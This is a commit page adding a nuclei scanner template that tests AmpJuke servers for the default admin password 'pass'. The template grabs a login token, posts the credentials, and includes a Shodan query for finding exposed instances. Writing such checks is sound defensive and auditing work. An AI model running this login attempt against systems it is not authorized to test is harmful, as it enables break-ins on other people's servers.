Merge pull request #9547 from projectdiscovery/ampjuke-default-login

Create ampjuke-default-login.yaml
patch-2
pussycat0x 2024-05-28 22:05:59 +05:30 committed by GitHub
commit 9dc048e694
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 61 additions and 0 deletions

View File

@ -0,0 +1,61 @@
id: ampjuke-default-login
info:
name: AmpJuke - Default Login
author: ritikchaddha
severity: high
description: |
AmpJuke contains a default login vulnerability. Default admin login password 'pass' was found.
metadata:
max-request: 2
shodan-query: http.favicon.hash:-121681558
tags: default-login,ampjuke
http:
- raw:
- |
GET /login.php HTTP/2
Host: {{Hostname}}
- |
POST /loginvalidate.php HTTP/2
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
uuid={{url_encode(token)}}&login={{username}}&password={{password}}&Submit=Submit
- |
GET /index.php?what=welcome HTTP/2
Host: {{Hostname}}
attack: pitchfork
payloads:
username:
- admin
password:
- pass
matchers-condition: and
matchers:
- type: word
part: body_3
words:
- 'AmpJuke'
- 'Track'
- 'Logout'
- 'Random play'
condition: and
case-insensitive: true
- type: status
status:
- 200
extractors:
- type: regex
part: body_1
name: token
group: 1
regex:
- 'name="uuid" value="([./a-z0-9-]+)">'
internal: true